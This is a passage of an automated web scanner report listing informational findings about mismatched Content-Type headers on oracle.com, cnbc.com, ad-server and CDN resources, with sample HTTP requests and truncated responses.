
Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.19. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.20. http://api-cdn.cnbc.com/api/chart/chart.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api-cdn.cnbc.com
Path:	/api/chart/chart.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.21. http://api.cnbc.com/api/chart/chart.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.cnbc.com
Path:	/api/chart/chart.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.22. http://api.viglink.com/api/ping previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.viglink.com
Path:	/api/ping

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/ping HTTP/1.1
Host: api.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 17:05:59 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 63
Connection: Close

error: Required string parameter 'key' is not present

31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://apps.cnbc.com
Path:	/Includes/CheckPng/Script.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.24. http://assets1.csc.com/contact_us/media/contact_us4.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://assets1.csc.com
Path:	/contact_us/media/contact_us4.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /contact_us/media/contact_us4.css HTTP/1.1
Host: assets1.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.3.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcsccom%253D%252526pid%25253DServices%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/contact_us%252526ot%25253DA%3B

Response

HTTP/1.0 200 OK
x-amz-id-2: NN2mfA5LpAM9OjMOFpyuRocT6yG6KHvhtAqnOd7zBFf9HoCw0CA+UYagWZ4HGzbt
x-amz-request-id: A4658F0B8F534814
Date: Tue, 05 Apr 2011 20:10:02 GMT
Last-Modified: Thu, 09 Sep 2010 16:57:48 GMT
ETag: "110fdbeea8d67aa93ab04add96edb26f"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1312
Server: AmazonS3
Age: 70336
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 03b57673d7bf80a7b9a006891bb21f176af9959c8054a1c5aa9988a705892a57bc4fac331f8a9ef6,92b83a937267d932bb7e90c7a946364129bbbe5dd7302b49943bfc3c0e646157bcee997bc5545e39
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 a9c811db7be33391d8494c0543c446ea.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<style>
ul#list_zones{font-size:0.9em;padding-left:12px;margin:0 0 10px 0;}
*html ul#list_zones {padding-left:15px;}
ul#list_zones li{list-style-image:url(http://assets1.csc.com/home/images/bullet_080
...[SNIP]...

31.25. http://assets1.csc.com/services/media/services3.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://assets1.csc.com
Path:	/services/media/services3.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /services/media/services3.css HTTP/1.1
Host: assets1.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/services
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.2.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_sess=%20s_cc%3Dtrue%3B%20ev4%3Dxss%3B%20s_sq%3Dcsccom%253D%252526pid%25253DSearch%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/services%252526ot%25253DA%3B

Response

HTTP/1.0 200 OK
x-amz-id-2: TXzkw+/ZF6bHKh24Icmd0pJrs21fuHrIecoLVrhF+qdahKaExnUOrCya+FKn/2CY
x-amz-request-id: 19A4B7235C794ED3
Date: Mon, 11 Oct 2010 20:27:51 GMT
Last-Modified: Thu, 09 Sep 2010 18:42:09 GMT
ETag: "d9cb18b4a038c7f46c24f9fe5ec7126e"
Content-Type: text/css
Content-Length: 2484
Server: AmazonS3
Age: 3471
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 2e825dc1ed328c6bf5076461d3ea8473e649a49a4135013b55b4f0650a12497c90bde6a02ba7d187,b4291688d12eec922db857a124635a44dbd927512b6718781ab33a2d5ce26996acff3b4bf12ddef8
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 a9c811db7be33391d8494c0543c446ea.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<style>
a{text-decoration:none;}
a:hover{text-decoration:underline;}
#billboard {float:left;width:746px;height:166px;background-image:url(http://assets1.csc.com/services/images/servicebb_120109b.jpg);
...[SNIP]...

31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blog.harbottle.com
Path:	/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blog.harbottle.com
Path:	/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.28. http://blog.harbottle.com/dm/xmlrpc.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blog.harbottle.com
Path:	/dm/xmlrpc.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/main/resource/resources/ora_code_blogs.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/otn/resource/1OTN-2col/OTNHead-Short.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

31.31. http://blogs.oracle.com/otn/resource/SunOracle.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/otn/resource/SunOracle.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

31.32. http://blogs.oracle.com/otn/resource/java-logo.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/otn/resource/java-logo.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4444103192084779
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4444103192084779,0:1)
Vary: Accept-Encoding
Content-Length: 9353
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...K...y.....q..L....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj..... A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/theme/scripts/clientSideInclude.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.34. http://blogs.oracle.com/theme/scripts/roller.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.oracle.com
Path:	/theme/scripts/roller.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=82;ecid=51681356926423946,0:1)
Content-Length: 6164
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

31.35. http://content.plymedia.com/initialize previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://content.plymedia.com
Path:	/initialize

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml; charset=utf-8

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /initialize?video=http%3A%2F%2Flink.brightcove.com%2Fservices%2Fplayer%2Fbcpid1640183659%3Fbctid%3D909846690001 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:14:08 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:08 GMT
Content-Length: 627
Connection: keep-alive

<VideoInformation><Video><VideoId>f979c890-22ec-412f-8e2c-df70d1568052</VideoId><Domain>Oracle</Domain><Duration>471.03</Duration><Url>http://content.plymedia.com/Video/Play
...[SNIP]...

31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dynpages-mktas.oracle.com
Path:	/pls/ebn/swf_viewer.load

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/swf_viewer.load HTTP/1.1
Host: dynpages-mktas.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:35 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 52
Connection: close
Content-Type: text/html; charset=UTF-8

Error: loading demo ...<p>
ORA-01403: no data found

31.37. http://education.oracle.com/education/css/oracle.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://education.oracle.com
Path:	/education/css/oracle.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /education/css/oracle.css HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/header?p_org_id=1001&lang=US
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "2214d8-3998-4a65aaa4"
Content-Type: text/css
Last-Modified: Tue, 21 Jul 2009 11:46:44 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=1;ecid=144115375327383499,0)
Content-Length: 14744
Date: Sat, 03 Sep 2011 05:26:33 GMT
Accept-Ranges: bytes

<STYLE TYPE="text/css">
html, body {padding:0;margin:0;}
.betastuff { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; text-decoration: none }

.bodylink {font-family: Arial
...[SNIP]...

31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/web_prod-plq-dad/Webreg_Search_Results.get_countries?p_countries=1001&p_org_id=1001&p_lang=US HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501
Cookie: SearchParams-cookie=%3CSearchParams%20type%3D%22SearchParams%22%3E%0A%20%20%20%3Ckeyword%20type%3D%22string%22%3Exss%3C/keyword%3E%0A%20%20%20%3Cstart_month%20type%3D%22string%22%3E%3C/start_month%3E%0A%20%20%20%3Cstart_year%20type%3D%22string%22%3E%3C/start_year%3E%0A%20%20%20%3Cend_month%20type%3D%22string%22%3E%3C/end_month%3E%0A%20%20%20%3Cend_year%20type%3D%22string%22%3E%3C/end_year%3E%0A%20%20%20%3Cfrom_date%20type%3D%22string%22%3E%3C/from_date%3E%0A%20%20%20%3Cto_date%20type%3D%22string%22%3E%3C/to_date%3E%0A%20%20%20%3Ccountries%20type%3D%22string%22%3E1001%3C/countries%3E%0A%20%20%20%3Cslocation%20type%3D%22string%22%3E%3C/slocation%3E%0A%20%20%20%3Ccategory_id%20type%3D%22string%22%3E%3C/category_id%3E%0A%20%20%20%3Cformat%20type%3D%22string%22%3E%3C/format%3E%0A%20%20%20%3CmaterialLang%20type%3D%22string%22%3E%3C/materialLang%3E%0A%20%20%20%3CspokenLang%20type%3D%22string%22%3E%3C/spokenLang%3E%0A%20%20%20%3CadvancedSearch%20type%3D%22string%22%3EY%3C/advancedSearch%3E%0A%20%20%20%3CforceExpSearch%20type%3D%22string%22%3E%3C/forceExpSearch%3E%0A%20%20%20%3CcopyObject%20type%3D%22Function%22%3E%0A%3C%21%5BCDATA%5Bfunction%20copyObject%28_obj%29%20%7B%0A%20%20%20%20this.keyword%20%3D%20_obj.keyword%3B%0A%20%20%20%20this.category_id%20%3D%20_obj.category_id%3B%0A%20%20%20%20this.format%20%3D%20_obj.format%3B%0A%20%20%20%20this.start_month%20%3D%20_obj.start_month%3B%0A%20%20%20%20this.start_year%20%3D%20_obj.start_year%3B%0A%20%20%20%20this.end_month%20%3D%20_obj.end_month%3B%0A%20%20%20%20this.end_year%20%3D%20_obj.end_year%3B%0A%20%20%20%20this.slocation%20%3D%20_obj.slocation%3B%0A%20%20%20%20this.countries%20%3D%20_obj.countries%3B%0A%20%20%20%20this.materialLang%20%3D%20_obj.materialLang%3B%0A%20%20%20%20this.forceExpSearch%20%3D%20_obj.forceExpSearch%3B%0A%20%20%20%20this.advancedSearch%20%3D%20_obj.advancedSearch%3B%0A%7D%5D%5D%3E%20%20%20%3C/copyObject%3E%0A%3C/SearchParams%3E%0A; BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value

Response

HTTP/1.1 200 OK
Content-Length: 4018
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115328082786817,0)
Date: Tue, 06 Sep 2011 16:02:22 GMT

<span style="color:BLACK; font-size:12px; font-weight:bold;">United States :</span>#AK#AK - Anchorage#AR#AR - Fayetteville#AR - Rogers#AZ#AZ - Phoenix#CA#CA - Belmont#CA - Burbank#CA - Carlsbad#CA - E
...[SNIP]...

31.39. https://event.on24.com/eventRegistration/prereg/register.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://event.on24.com
Path:	/eventRegistration/prereg/register.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /eventRegistration/prereg/register.jsp HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Content-Length: 61
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

Missing clientid parameter

31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/feed-icon-14x14.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

Response

31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/info_company.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

Response

31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/oralogo_small.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

Response

31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/otn_new.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code_forums.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/spacer.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

Response

31.47. https://forums.oracle.com/forums/themes/english/resources/style.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/style.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

31.48. http://goku.brightcove.com/1pix.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://goku.brightcove.com
Path:	/1pix.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1315343574519&playerURL=http%3A//blogs.oracle.com/otn/&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&os=Windows%20Server%202008%20R2&dcsref=http%3A//www.oracle.com/technetwork/index.html%3FssSourceSiteId%3Docomen&affiliateId=&publisherId=1460825906&playerId=1640183659&time=900&dcsuri=/viewer/player_load&mem=5512&sourceId=1460825906&playerTag= HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:58 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

31.49. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.50. http://l.apture.com/v3/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l.apture.com
Path:	/v3/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

